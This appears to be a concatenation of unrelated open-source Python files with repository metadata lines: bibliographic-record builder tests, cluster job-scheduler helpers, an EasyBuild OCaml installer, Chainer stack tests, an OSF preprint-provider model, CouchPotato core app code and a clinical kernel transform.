'full_name': 'Smith, John',
'record': author_record,
}
assert validate([result], subschema) is None
assert expected == result
def test_make_author_handles_none_in_id_schema():
schema = load_schema('hep')
subschema = schema['properties']['authors']
builder = LiteratureBuilder()
result = builder.make_author(
'Smith, John',
ids=[(None, 'J.Smith.1')],
)
expected = {
'full_name': 'Smith, John',
}
assert validate([result], subschema) is None
assert expected == result
def test_add_external_system_identifier():
schema = load_schema('hep')
subschema = schema['properties']['external_system_identifiers']
builder = LiteratureBuilder()
builder.add_external_system_identifier('12345', 'osti')
result = builder.record['external_system_identifiers']
expected = [
{
'value': '12345',
'schema': 'osti',
}
]
assert validate(result, subschema) is None
assert expected == result
def test_add_many_external_system_identifier():
schema = load_schema('hep')
subschema = schema['properties']['external_system_identifiers']
builder = LiteratureBuilder()
builder.add_external_system_identifier('5758037', 'osti')
builder.add_external_system_identifier('1992PhRvD..45..124K', 'ADS')
result = builder.record['external_system_identifiers']
expected = [
{
'value': '5758037',
'schema': 'osti',
},
{
'value': '1992PhRvD..45..124K',
'schema': 'ADS',
},
]
assert validate(result, subschema) is None
assert expected == result
def test_add_external_system_identifier_kwargs():
schema = load_schema('hep')
subschema = schema['properties']['external_system_identifiers']
builder = LiteratureBuilder()
builder.add_external_system_identifier(schema='osti', extid='12345')
result = builder.record['external_system_identifiers']
expected = [
{
'value': '12345',
'schema': 'osti',
}
]
assert validate(result, subschema) is None
assert expected == result
def test_add_external_system_identifier_empty_kwargs():
builder = LiteratureBuilder()
builder.add_external_system_identifier(schema='', extid='')
assert 'external_system_identifiers' not in builder.record
| inspirehep/inspire-schemas | tests/unit/test_literature_builder.py | Python | gpl-2.0 | 19,286 |
"""
Module to help working with schedulers such as Sun Grid Engine (SGE) or
Simple Linux Utility for Resource Management (SLURM).
Main functions covered are:
- get the list of names of all running jobs;
- easily generate a submission query for a job.
"""
# Authors: Arnaud Joly
#
# License: BSD 3 clause
import subprocess
from xml.etree import ElementTree
__all__ = [
"queued_or_running_jobs",
"submit"
]
def _sge_queued_or_running_jobs():
try:
xml = subprocess.check_output("qstat -xml", shell=True,
stderr=subprocess.PIPE)
tree = ElementTree.fromstring(xml)
return [leaf.text for leaf in tree.iter("JB_name")]
except subprocess.CalledProcessError:
# qstat is not available
return []
def _slurm_queued_or_running_jobs():
try:
out = subprocess.check_output("squeue --noheader -o %j", shell=True,
stderr=subprocess.PIPE)
out = out.split("\n")[:-1]
return out
except subprocess.CalledProcessError:
# squeue is not available
return []
def queued_or_running_jobs():
"""Return the names of the queued or running jobs under SGE and SLURM
The list of jobs could be either the list of all jobs on the scheduler
    or only the jobs associated with the user calling this function.
    The default behavior is dependent upon scheduler configuration.
Try ``qstat`` in SGE or ``squeue`` in SLURM to know which behavior it
follows.
Returns
-------
out : list of string,
Returned a list containing all the names of the jobs that are running
or queued under the SGE or SLURM scheduler.
"""
out = []
for queued_or_running in (_sge_queued_or_running_jobs,
_slurm_queued_or_running_jobs):
out.extend(queued_or_running())
return out
_SGE_TEMPLATE = {
"job_name": '-N "%s"',
"memory": "-l h_vmem=%sM",
"time": "-l h_rt=%s",
"email": "-M %s",
"email_options": "-m %s",
"log_directory": "-o %s/$JOB_NAME.$JOB_ID",
}
_SLURM_TEMPLATE = {
"job_name": '--job-name=%s',
"memory": "--mem=%s",
"time": "--time=%s",
"email": "--mail-user=%s",
"email_options": "--mail-type=%s",
"log_directory": "-o %s/%s.txt",
}
_TEMPLATE = {
"sge": _SGE_TEMPLATE,
"slurm": _SLURM_TEMPLATE
}
_LAUNCHER = {
"sge": "qsub",
"slurm": "sbatch",
}
def submit(job_command, job_name="job", time="24:00:00", memory=4000,
email=None, email_options=None, log_directory=None, backend="slurm",
shell_script="#!/bin/bash"):
"""Write the submission query (without script)
Parameters
----------
job_command : str,
Command associated to the job, e.g. 'python main.py'.
job_name : str, optional (default="job")
Name of the job.
time : str, optional (default="24:00:00")
Maximum time format "HH:MM:SS".
memory : str, optional (default=4000)
Maximum virtual memory in mega-bytes
email : str, optional (default=None)
Email where job information is sent. If None, no email is asked
to be sent.
email_options : str, optional (default=None)
Specify email options:
- SGE : Format char from beas (begin,end,abort,stop) for SGE.
- SLURM : either BEGIN, END, FAIL, REQUEUE or ALL.
        See the documentation for more information.
log_directory : str, optional (default=None)
Specify the log directory. If None, no log directory is specified.
backend : {'sge', 'slurm'}, optional (default="slurm")
Backend where the job will be submitted
shell_script : str, optional (default="#!/bin/bash")
Specify shell that is used by the script.
Returns
-------
submission_query : str,
Return the submission query in the appropriate format.
        The obtained query can be launched directly using, for instance, ``os.system``.
Further options could be appended at the end of the string.
Examples
--------
First, let's generate a command for SLURM to launch the program
``main.py``.
>>> from clusterlib.scheduler import submit
>>> script = submit("python main.py --args 1")
>>> print(script)
echo '#!/bin/bash
python main.py --args 1' | sbatch --job-name=job --time=24:00:00 --mem=4000
    The job can later be launched using, for instance, ``os.system(script)``.
"""
if backend in _TEMPLATE:
launcher = _LAUNCHER[backend]
template = _TEMPLATE[backend]
else:
raise ValueError("Unknown backend %s expected any of %s"
% (backend, "{%s}" % ",".join(_TEMPLATE)))
job_options = [
template["job_name"] % job_name,
template["time"] % time,
template["memory"] % memory,
]
if email:
job_options.append(template["email"] % email)
if email_options:
job_options.append(template["email_options"] % email_options)
if log_directory:
if backend == "sge":
job_options.append(template["log_directory"] % log_directory)
elif backend == "slurm":
job_options.append(template["log_directory"]
% (log_directory, job_name))
# Using echo job_commands | launcher job_options allows to avoid creating
# a script file. The script is indeed created on the flight.
command = ("echo '%s\n%s' | %s %s"
% (shell_script, job_command, launcher, " ".join(job_options)))
return command
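# --- Illustrative usage sketch (not part of the original clusterlib API) ---
# Assumptions: the job names ("job-0", ...) and the "python main.py" command
# are hypothetical; only queued_or_running_jobs() and submit() come from this
# module. A common pattern is to skip jobs that are already on the scheduler.
if __name__ == "__main__":
    import os
    already_there = set(queued_or_running_jobs())
    for task_id in range(3):
        name = "job-%d" % task_id
        if name in already_there:
            continue
        # submit() only builds the submission command; it still has to be run.
        os.system(submit("python main.py --task %d" % task_id,
                         job_name=name, backend="slurm"))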
| lesteve/clusterlib | clusterlib/scheduler.py | Python | bsd-3-clause | 5,598 |
import logging
import pandasdmx
pandasdmx.logger.setLevel(logging.DEBUG)
| dr-leo/pandaSDMX | pandasdmx/tests/conftest.py | Python | apache-2.0 | 75 |
##
# Copyright 2015-2020 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# https://github.com/easybuilders/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for OCaml packages, implemented as an easyblock
@author: Kenneth Hoste (Ghent University)
"""
from easybuild.framework.extensioneasyblock import ExtensionEasyBlock
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.run import run_cmd
class OCamlPackage(ExtensionEasyBlock):
"""Builds and installs OCaml packages using OPAM package manager."""
def configure_step(self):
"""Raise error when configure step is run: installing OCaml packages stand-alone is not supported (yet)"""
raise EasyBuildError("Installing OCaml packages stand-alone is not supported (yet)")
def run(self):
"""Perform OCaml package installation (as extension)."""
# install using 'opam install'
run_cmd("eval `opam config env` && opam install -yv %s.%s" % (self.name, self.version))
# 'opam pin add' fixes the version of the package
# see https://opam.ocaml.org/doc/Usage.html#opampin
run_cmd("eval `opam config env` && opam pin -yv add %s %s" % (self.name, self.version))
| pescobar/easybuild-easyblocks | easybuild/easyblocks/generic/ocamlpackage.py | Python | gpl-2.0 | 2,118 |
# Copyright 2020 Camptocamp SA
# License AGPL-3.0 or later (https://www.gnu.org/licenses/agpl)
{
"name": "Test Base Time Window",
"summary": "Test Base model to handle time windows",
"version": "14.0.1.0.1",
"category": "Technical Settings",
"author": "ACSONE SA/NV, Camptocamp, Odoo Community Association (OCA)",
"license": "AGPL-3",
"website": "https://github.com/OCA/server-tools",
"depends": ["base_time_window"],
"data": ["security/ir.model.access.xml"],
"installable": True,
}
| OCA/server-tools | test_base_time_window/__manifest__.py | Python | agpl-3.0 | 523 |
import unittest
import numpy
import chainer
from chainer import backend
from chainer.backends import cuda
from chainer import functions
from chainer import gradient_check
from chainer import testing
from chainer.testing import attr
import chainerx
@testing.parameterize(*testing.product_dict(
[
{'shape': (3, 4), 'axis': 0, 'y_shape': (2, 3, 4)},
{'shape': (3, 4), 'axis': 1, 'y_shape': (3, 2, 4)},
{'shape': (3, 4), 'axis': 2, 'y_shape': (3, 4, 2)},
{'shape': (3, 4), 'axis': -1, 'y_shape': (3, 4, 2)},
{'shape': (3, 4), 'axis': -2, 'y_shape': (3, 2, 4)},
{'shape': (3, 4), 'axis': -3, 'y_shape': (2, 3, 4)},
{'shape': (), 'axis': 0, 'y_shape': (2,)},
{'shape': (), 'axis': -1, 'y_shape': (2,)},
],
[
{'dtype': numpy.float16},
{'dtype': numpy.float32},
{'dtype': numpy.float64},
]
))
class TestStack(unittest.TestCase):
def setUp(self):
self.xs = [
numpy.random.uniform(-1, 1, self.shape).astype(self.dtype),
numpy.random.uniform(-1, 1, self.shape).astype(self.dtype),
]
self.g = numpy.random.uniform(-1, 1, self.y_shape).astype(self.dtype)
self.ggs = [
numpy.random.uniform(-1, 1, self.shape).astype(self.dtype),
numpy.random.uniform(-1, 1, self.shape).astype(self.dtype),
]
def check_forward(self, xs_data):
xs = [chainer.Variable(x) for x in xs_data]
y = functions.stack(xs, axis=self.axis)
if hasattr(numpy, 'stack'):
# run test only with numpy>=1.10
expect = numpy.stack(self.xs, axis=self.axis)
testing.assert_allclose(y.data, expect)
y_data = backend.CpuDevice().send(y.data)
self.assertEqual(y_data.shape[self.axis], 2)
numpy.testing.assert_array_equal(
y_data.take(0, axis=self.axis), self.xs[0])
numpy.testing.assert_array_equal(
y_data.take(1, axis=self.axis), self.xs[1])
def test_forward_cpu(self):
self.check_forward(self.xs)
@attr.gpu
def test_forward_gpu(self):
self.check_forward([cuda.to_gpu(x) for x in self.xs])
@attr.chainerx
def test_forward_chainerx(self):
self.check_forward([chainerx.array(x) for x in self.xs])
def check_backward(self, xs_data, g_data):
def func(*xs):
return functions.stack(xs, self.axis)
gradient_check.check_backward(
func, xs_data, g_data, eps=2.0 ** -2, dtype='d')
def test_backward_cpu(self):
self.check_backward(self.xs, self.g)
@attr.gpu
def test_backward_gpu(self):
self.check_backward(
[cuda.to_gpu(x) for x in self.xs], cuda.to_gpu(self.g))
@attr.chainerx
def test_backward_chainerx(self):
self.check_backward(
[chainerx.array(x) for x in self.xs], chainerx.array(self.g))
def check_double_backward(self, xs_data, g_data, ggs_data):
def func(*xs):
return functions.stack(xs, self.axis)
gradient_check.check_double_backward(
func, xs_data, g_data, ggs_data, dtype=numpy.float64)
def test_double_backward_cpu(self):
self.check_double_backward(self.xs, self.g, self.ggs)
@attr.gpu
def test_double_backward_gpu(self):
self.check_double_backward(
cuda.to_gpu(self.xs), cuda.to_gpu(self.g), cuda.to_gpu(self.ggs))
@attr.chainerx
def test_double_backward_chainerx(self):
self.check_double_backward(
backend.to_chx(self.xs),
backend.to_chx(self.g),
backend.to_chx(self.ggs))
testing.run_module(__name__, __file__)
| okuta/chainer | tests/chainer_tests/functions_tests/array_tests/test_stack.py | Python | mit | 3,692 |
# -*- coding: utf-8 -*-
from django.contrib.postgres import fields
from django.contrib.auth.models import Group
from api.taxonomies.utils import optimize_subject_query
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from dirtyfields import DirtyFieldsMixin
from api.preprint_providers.permissions import GroupHelper, PERMISSIONS, GROUP_FORMAT, GROUPS
from osf.models.base import BaseModel, ObjectIDMixin
from osf.models.licenses import NodeLicense
from osf.models.mixins import ReviewProviderMixin
from osf.models.subject import Subject
from osf.utils.datetime_aware_jsonfield import DateTimeAwareJSONField
from osf.utils.fields import EncryptedTextField
from website import settings
from website.util import api_v2_url
class PreprintProvider(ObjectIDMixin, ReviewProviderMixin, DirtyFieldsMixin, BaseModel):
PUSH_SHARE_TYPE_CHOICES = (('Preprint', 'Preprint'),
('Thesis', 'Thesis'),)
PUSH_SHARE_TYPE_HELP = 'This SHARE type will be used when pushing publications to SHARE'
REVIEWABLE_RELATION_NAME = 'preprint_services'
name = models.CharField(null=False, max_length=128) # max length on prod: 22
description = models.TextField(default='', blank=True)
domain = models.URLField(blank=True, default='', max_length=200)
domain_redirect_enabled = models.BooleanField(default=False)
external_url = models.URLField(null=True, blank=True, max_length=200) # max length on prod: 25
email_contact = models.CharField(null=True, blank=True, max_length=200) # max length on prod: 23
email_support = models.CharField(null=True, blank=True, max_length=200) # max length on prod: 23
example = models.CharField(null=True, blank=True, max_length=20) # max length on prod: 5
access_token = EncryptedTextField(null=True, blank=True)
advisory_board = models.TextField(default='', blank=True)
social_twitter = models.CharField(null=True, blank=True, max_length=200) # max length on prod: 8
social_facebook = models.CharField(null=True, blank=True, max_length=200) # max length on prod: 8
social_instagram = models.CharField(null=True, blank=True, max_length=200) # max length on prod: 8
footer_links = models.TextField(default='', blank=True)
share_publish_type = models.CharField(choices=PUSH_SHARE_TYPE_CHOICES,
default='Preprint',
help_text=PUSH_SHARE_TYPE_HELP,
max_length=32)
share_source = models.CharField(blank=True, max_length=200)
share_title = models.TextField(default='', blank=True)
allow_submissions = models.BooleanField(default=True)
additional_providers = fields.ArrayField(models.CharField(max_length=200), default=list, blank=True)
facebook_app_id = models.BigIntegerField(blank=True, null=True)
PREPRINT_WORD_CHOICES = (
('preprint', 'Preprint'),
('paper', 'Paper'),
('thesis', 'Thesis'),
('none', 'None')
)
preprint_word = models.CharField(max_length=10, choices=PREPRINT_WORD_CHOICES, default='preprint')
subjects_acceptable = DateTimeAwareJSONField(blank=True, default=list)
licenses_acceptable = models.ManyToManyField(NodeLicense, blank=True, related_name='licenses_acceptable')
default_license = models.ForeignKey(NodeLicense, related_name='default_license',
null=True, blank=True, on_delete=models.CASCADE)
class Meta:
permissions = tuple(PERMISSIONS.items()) + (
# custom permissions for use in the OSF Admin App
('view_preprintprovider', 'Can view preprint provider details'),
)
def __unicode__(self):
return '{} with id {}'.format(self.name, self.id)
@property
def has_highlighted_subjects(self):
return self.subjects.filter(highlighted=True).exists()
@property
def highlighted_subjects(self):
if self.has_highlighted_subjects:
return self.subjects.filter(highlighted=True).order_by('text')[:10]
else:
return sorted(self.top_level_subjects, key=lambda s: s.text)[:10]
@property
def top_level_subjects(self):
if self.subjects.exists():
return optimize_subject_query(self.subjects.filter(parent__isnull=True))
else:
            # TODO: Delete this when all PreprintProviders have a mapping
if len(self.subjects_acceptable) == 0:
return optimize_subject_query(Subject.objects.filter(parent__isnull=True, provider___id='osf'))
tops = set([sub[0][0] for sub in self.subjects_acceptable])
return [Subject.load(sub) for sub in tops]
@property
def all_subjects(self):
if self.subjects.exists():
return self.subjects.all()
else:
            # TODO: Delete this when all PreprintProviders have a mapping
return rules_to_subjects(self.subjects_acceptable)
@property
def landing_url(self):
return self.domain if self.domain else '{}preprints/{}'.format(settings.DOMAIN, self.name.lower())
def get_absolute_url(self):
return '{}preprint_providers/{}'.format(self.absolute_api_v2_url, self._id)
@property
def absolute_api_v2_url(self):
path = '/preprint_providers/{}/'.format(self._id)
return api_v2_url(path)
def save(self, *args, **kwargs):
dirty_fields = self.get_dirty_fields()
old_id = dirty_fields.get('_id', None)
if old_id:
for permission_type in GROUPS.keys():
Group.objects.filter(
name=GROUP_FORMAT.format(provider_id=old_id, group=permission_type)
).update(
name=GROUP_FORMAT.format(provider_id=self._id, group=permission_type)
)
return super(PreprintProvider, self).save(*args, **kwargs)
def rules_to_subjects(rules):
if not rules:
return Subject.objects.filter(provider___id='osf')
q = []
for rule in rules:
parent_from_rule = Subject.load(rule[0][-1])
if rule[1]:
q.append(models.Q(parent=parent_from_rule))
if len(rule[0]) == 1:
potential_parents = Subject.objects.filter(parent=parent_from_rule)
for parent in potential_parents:
q.append(models.Q(parent=parent))
for sub in rule[0]:
q.append(models.Q(_id=sub))
return Subject.objects.filter(reduce(lambda x, y: x | y, q)) if len(q) > 1 else (Subject.objects.filter(q[0]) if len(q) else Subject.objects.all())
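# Illustrative reading of the loop above (an interpretation, not an official
# schema): each rule appears to be a pair (list of subject ids, flag), where
# the flag asks for child subjects of the last id to be included as well, e.g.
# rules_to_subjects([(['subj-id-a', 'subj-id-b'], True)]) matches 'subj-id-a',
# 'subj-id-b', and the children of 'subj-id-b'. The ids shown are hypothetical.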
@receiver(post_save, sender=PreprintProvider)
def create_provider_auth_groups(sender, instance, created, **kwargs):
if created:
GroupHelper(instance).update_provider_auth_groups()
| chennan47/osf.io | osf/models/preprint_provider.py | Python | apache-2.0 | 6,881 |
from uuid import uuid4
import os
import platform
import signal
import time
import traceback
import webbrowser
from couchpotato.api import addApiView
from couchpotato.core.event import fireEvent, addEvent
from couchpotato.core.helpers.variable import cleanHost, md5
from couchpotato.core.logger import CPLog
from couchpotato.core.plugins.base import Plugin
from couchpotato.environment import Env
from tornado.ioloop import IOLoop
log = CPLog(__name__)
autoload = 'Core'
class Core(Plugin):
ignore_restart = [
'Core.restart', 'Core.shutdown',
'Updater.check', 'Updater.autoUpdate',
]
shutdown_started = False
def __init__(self):
addApiView('app.shutdown', self.shutdown, docs = {
'desc': 'Shutdown the app.',
'return': {'type': 'string: shutdown'}
})
addApiView('app.restart', self.restart, docs = {
'desc': 'Restart the app.',
'return': {'type': 'string: restart'}
})
addApiView('app.available', self.available, docs = {
'desc': 'Check if app available.'
})
addApiView('app.version', self.versionView, docs = {
'desc': 'Get version.'
})
addEvent('app.shutdown', self.shutdown)
addEvent('app.restart', self.restart)
addEvent('app.load', self.launchBrowser, priority = 1)
addEvent('app.base_url', self.createBaseUrl)
addEvent('app.api_url', self.createApiUrl)
addEvent('app.version', self.version)
addEvent('app.load', self.checkDataDir)
addEvent('app.load', self.cleanUpFolders)
addEvent('setting.save.core.password', self.md5Password)
addEvent('setting.save.core.api_key', self.checkApikey)
# Make sure we can close-down with ctrl+c properly
if not Env.get('desktop'):
self.signalHandler()
# Set default urlopen timeout
import socket
socket.setdefaulttimeout(30)
def md5Password(self, value):
return md5(value) if value else ''
def checkApikey(self, value):
return value if value and len(value) > 3 else uuid4().hex
def checkDataDir(self):
if Env.get('app_dir') in Env.get('data_dir'):
log.error('You should NOT use your CouchPotato directory to save your settings in. Files will get overwritten or be deleted.')
return True
def cleanUpFolders(self):
self.deleteEmptyFolder(Env.get('app_dir'), show_error = False)
def available(self, **kwargs):
return {
'success': True
}
def shutdown(self, **kwargs):
if self.shutdown_started:
return False
def shutdown():
self.initShutdown()
if IOLoop.current()._closing:
shutdown()
else:
IOLoop.current().add_callback(shutdown)
return 'shutdown'
def restart(self, **kwargs):
if self.shutdown_started:
return False
def restart():
self.initShutdown(restart = True)
IOLoop.current().add_callback(restart)
return 'restarting'
def initShutdown(self, restart = False):
if self.shutdown_started:
log.info('Already shutting down')
return
log.info('Shutting down' if not restart else 'Restarting')
self.shutdown_started = True
fireEvent('app.do_shutdown')
log.debug('Every plugin got shutdown event')
loop = True
starttime = time.time()
while loop:
log.debug('Asking who is running')
still_running = fireEvent('plugin.running', merge = True)
log.debug('Still running: %s', still_running)
if len(still_running) == 0:
break
elif starttime < time.time() - 30: # Always force break after 30s wait
break
running = list(set(still_running) - set(self.ignore_restart))
if len(running) > 0:
log.info('Waiting on plugins to finish: %s', running)
else:
loop = False
time.sleep(1)
log.debug('Safe to shutdown/restart')
try:
if not IOLoop.current()._closing:
IOLoop.current().stop()
except RuntimeError:
pass
except:
log.error('Failed shutting down the server: %s', traceback.format_exc())
fireEvent('app.after_shutdown', restart = restart)
def launchBrowser(self):
if Env.setting('launch_browser'):
log.info('Launching browser')
url = self.createBaseUrl()
try:
webbrowser.open(url, 2, 1)
except:
try:
webbrowser.open(url, 1, 1)
except:
log.error('Could not launch a browser.')
def createBaseUrl(self):
host = Env.setting('host')
if host == '0.0.0.0' or host == '':
host = 'localhost'
port = Env.setting('port')
return '%s:%d%s' % (cleanHost(host).rstrip('/'), int(port), Env.get('web_base'))
def createApiUrl(self):
return '%sapi/%s' % (self.createBaseUrl(), Env.setting('api_key'))
def version(self):
ver = fireEvent('updater.info', single = True)
if os.name == 'nt': platf = 'windows'
elif 'Darwin' in platform.platform(): platf = 'osx'
else: platf = 'linux'
return '%s - %s-%s - v2' % (platf, ver.get('version')['type'], ver.get('version')['hash'])
def versionView(self, **kwargs):
return {
'version': self.version()
}
def signalHandler(self):
if Env.get('daemonized'): return
def signal_handler(*args, **kwargs):
fireEvent('app.shutdown', single = True)
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
config = [{
'name': 'core',
'order': 1,
'groups': [
{
'tab': 'general',
'name': 'basics',
'description': 'Needs restart before changes take effect.',
'wizard': True,
'options': [
{
'name': 'username',
'default': '',
},
{
'name': 'password',
'default': '',
'type': 'password',
},
{
'name': 'port',
'default': 5050,
'type': 'int',
'description': 'The port I should listen to.',
},
{
'name': 'ssl_cert',
'description': 'Path to SSL server.crt',
'advanced': True,
},
{
'name': 'ssl_key',
'description': 'Path to SSL server.key',
'advanced': True,
},
{
'name': 'launch_browser',
'default': True,
'type': 'bool',
'description': 'Launch the browser when I start.',
'wizard': True,
},
],
},
{
'tab': 'general',
'name': 'advanced',
'description': "For those who know what they're doing",
'advanced': True,
'options': [
{
'name': 'api_key',
'default': uuid4().hex,
'readonly': 1,
'description': 'Let 3rd party app do stuff. <a target="_self" href="../../docs/">Docs</a>',
},
{
'name': 'debug',
'default': 0,
'type': 'bool',
'description': 'Enable debugging.',
},
{
'name': 'development',
'default': 0,
'type': 'bool',
'description': 'Enable this if you\'re developing, and NOT in any other case, thanks.',
},
{
'name': 'data_dir',
'type': 'directory',
'description': 'Where cache/logs/etc are stored. Keep empty for defaults.',
},
{
'name': 'url_base',
'default': '',
'description': 'When using mod_proxy use this to append the url with this.',
},
{
'name': 'permission_folder',
'default': '0755',
'label': 'Folder CHMOD',
'description': 'Can be either decimal (493) or octal (leading zero: 0755)',
},
{
'name': 'permission_file',
'default': '0755',
'label': 'File CHMOD',
'description': 'Same as Folder CHMOD but for files',
},
],
},
],
}]
| Aristocles/CouchPotatoServer | couchpotato/core/_base/_core.py | Python | gpl-3.0 | 9,215 |
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import numpy
import pandas
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.utils.validation import check_is_fitted
from ._clinical_kernel import continuous_ordinal_kernel, continuous_ordinal_kernel_with_ranges, \
pairwise_continuous_ordinal_kernel, pairwise_nominal_kernel
__all__ = ['clinical_kernel', 'ClinicalKernelTransform']
def _nominal_kernel(x, y, out):
"""Number of features that match exactly"""
for i in range(x.shape[0]):
for j in range(y.shape[0]):
out[i, j] += (x[i, :] == y[j, :]).sum()
return out
def _get_continuous_and_ordinal_array(x):
"""Convert array from continuous and ordered categorical columns"""
nominal_columns = x.select_dtypes(include=['object', 'category']).columns
ordinal_columns = pandas.Index([v for v in nominal_columns if x[v].cat.ordered])
continuous_columns = x.select_dtypes(include=[numpy.number]).columns
x_num = x.loc[:, continuous_columns].astype(numpy.float64).values
if len(ordinal_columns) > 0:
x = _ordinal_as_numeric(x, ordinal_columns)
nominal_columns = nominal_columns.difference(ordinal_columns)
x_out = numpy.column_stack((x_num, x))
else:
x_out = x_num
return x_out, nominal_columns
def _ordinal_as_numeric(x, ordinal_columns):
x_numeric = numpy.empty((x.shape[0], len(ordinal_columns)), dtype=numpy.float64)
for i, c in enumerate(ordinal_columns):
x_numeric[:, i] = x[c].cat.codes
return x_numeric
def clinical_kernel(x, y=None):
"""Computes clinical kernel
    The clinical kernel distinguishes between continuous,
    ordinal, and nominal variables.
Parameters
----------
x : pandas.DataFrame, shape = [n_samples_x, n_features]
Training data
y : pandas.DataFrame, shape = [n_samples_y, n_features]
Testing data
Returns
-------
kernel : array, shape = [n_samples_x, n_samples_y]
Kernel matrix. Values are normalized to lie within [0, 1].
References
----------
.. [1] Daemen, A., De Moor, B.,
"Development of a kernel function for clinical data".
Annual International Conference of the IEEE Engineering in Medicine and Biology Society, 5913-7, 2009
"""
if y is not None:
if x.shape[1] != y.shape[1]:
raise ValueError('x and y have different number of features')
if not x.columns.equals(y.columns):
raise ValueError('columns do not match')
else:
y = x
mat = numpy.zeros((x.shape[0], y.shape[0]), dtype=float)
x_numeric, nominal_columns = _get_continuous_and_ordinal_array(x)
if id(x) != id(y):
y_numeric, _ = _get_continuous_and_ordinal_array(y)
else:
y_numeric = x_numeric
continuous_ordinal_kernel(x_numeric, y_numeric, mat)
_nominal_kernel(x.loc[:, nominal_columns].values,
y.loc[:, nominal_columns].values,
mat)
mat /= x.shape[1]
return mat
class ClinicalKernelTransform(BaseEstimator, TransformerMixin):
"""Transform data using a clinical Kernel
    The clinical kernel distinguishes between continuous,
    ordinal, and nominal variables.
Parameters
----------
fit_once : bool, optional
        If set to ``True``, fit() only transforms the training data and does not update
its internal state. You should call prepare() once before calling transform().
If set to ``False``, it behaves like a regular estimator, i.e., you need to
call fit() before transform().
References
----------
.. [1] Daemen, A., De Moor, B.,
"Development of a kernel function for clinical data".
Annual International Conference of the IEEE Engineering in Medicine and Biology Society, 5913-7, 2009
"""
def __init__(self, fit_once=False, _numeric_ranges=None, _numeric_columns=None, _nominal_columns=None):
self.fit_once = fit_once
self._numeric_ranges = _numeric_ranges
self._numeric_columns = _numeric_columns
self._nominal_columns = _nominal_columns
def prepare(self, X):
"""Determine transformation parameters from data in X.
Use if `fit_once` is `True`, in which case `fit()` does
not set the parameters of the clinical kernel.
Parameters
----------
X: pandas.DataFrame, shape = [n_samples, n_features]
Data to estimate parameters from.
"""
if not self.fit_once:
raise ValueError('prepare can only be used if fit_once parameter is set to True')
self._prepare_by_column_dtype(X)
def _prepare_by_column_dtype(self, X):
"""Get distance functions for each column's dtype"""
if not isinstance(X, pandas.DataFrame):
raise TypeError('X must be a pandas DataFrame')
numeric_columns = []
nominal_columns = []
numeric_ranges = []
fit_data = numpy.empty_like(X)
for i, dt in enumerate(X.dtypes):
col = X.iloc[:, i]
if pandas.core.common.is_categorical_dtype(dt):
if col.cat.ordered:
numeric_ranges.append(col.cat.codes.max() - col.cat.codes.min())
numeric_columns.append(i)
else:
nominal_columns.append(i)
col = col.cat.codes
elif pandas.core.common.is_numeric_dtype(dt):
numeric_ranges.append(col.max() - col.min())
numeric_columns.append(i)
else:
raise TypeError('unsupported dtype: %r' % dt)
fit_data[:, i] = col.values
self._numeric_columns = numpy.asarray(numeric_columns)
self._nominal_columns = numpy.asarray(nominal_columns)
self._numeric_ranges = numpy.asarray(numeric_ranges, dtype=float)
self.X_fit_ = fit_data
def fit(self, X, y=None, **kwargs):
"""Determine transformation parameters from data in X.
Subsequent calls to `transform(Y)` compute the pairwise
distance to `X`.
Parameters of the clinical kernel are only updated
if `fit_once` is `False`, otherwise you have to
explicitly call `prepare()` once.
Parameters
----------
X: pandas.DataFrame, shape = [n_samples, n_features]
Data to estimate parameters from.
Returns
-------
self : object
Returns the instance itself.
"""
if X.ndim != 2:
raise ValueError("expected 2d array, but got %d" % X.ndim)
if self.fit_once:
self.X_fit_ = X
else:
self._prepare_by_column_dtype(X)
return self
def transform(self, Y):
"""Compute all pairwise distances between `self.X_fit_` and `Y`.
Parameters
----------
y : array-like, shape = [n_samples_y, n_features]
Returns
-------
kernel : array, shape = [n_samples_y, n_samples_X_fit\_]
Kernel matrix. Values are normalized to lie within [0, 1].
"""
check_is_fitted(self, 'X_fit_')
n_samples_x, n_features = self.X_fit_.shape
Y = numpy.asarray(Y)
if Y.shape[1] != n_features:
raise ValueError('expected array with %d features, but got %d' % (n_features, Y.shape[1]))
n_samples_y = Y.shape[0]
mat = numpy.zeros((n_samples_y, n_samples_x), dtype=float)
continuous_ordinal_kernel_with_ranges(Y[:, self._numeric_columns].astype(numpy.float64),
self.X_fit_[:, self._numeric_columns].astype(numpy.float64),
self._numeric_ranges, mat)
if len(self._nominal_columns) > 0:
_nominal_kernel(Y[:, self._nominal_columns],
self.X_fit_[:, self._nominal_columns],
mat)
mat /= n_features
return mat
def __call__(self, X, Y):
"""Compute Kernel matrix between `X` and `Y`.
Parameters
----------
x : array-like, shape = [n_samples_x, n_features]
Training data
y : array-like, shape = [n_samples_y, n_features]
Testing data
Returns
-------
kernel : array, shape = [n_samples_x, n_samples_y]
Kernel matrix. Values are normalized to lie within [0, 1].
"""
return self.fit(X).transform(Y).T
def pairwise_kernel(self, X, Y):
"""Function to use with :func:`sklearn.metrics.pairwise.pairwise_kernels`
Parameters
----------
X : array, shape = [n_features]
Y : array, shape = [n_features]
Returns
-------
similarity : float
Similarities are normalized to be within [0, 1]
"""
check_is_fitted(self, 'X_fit_')
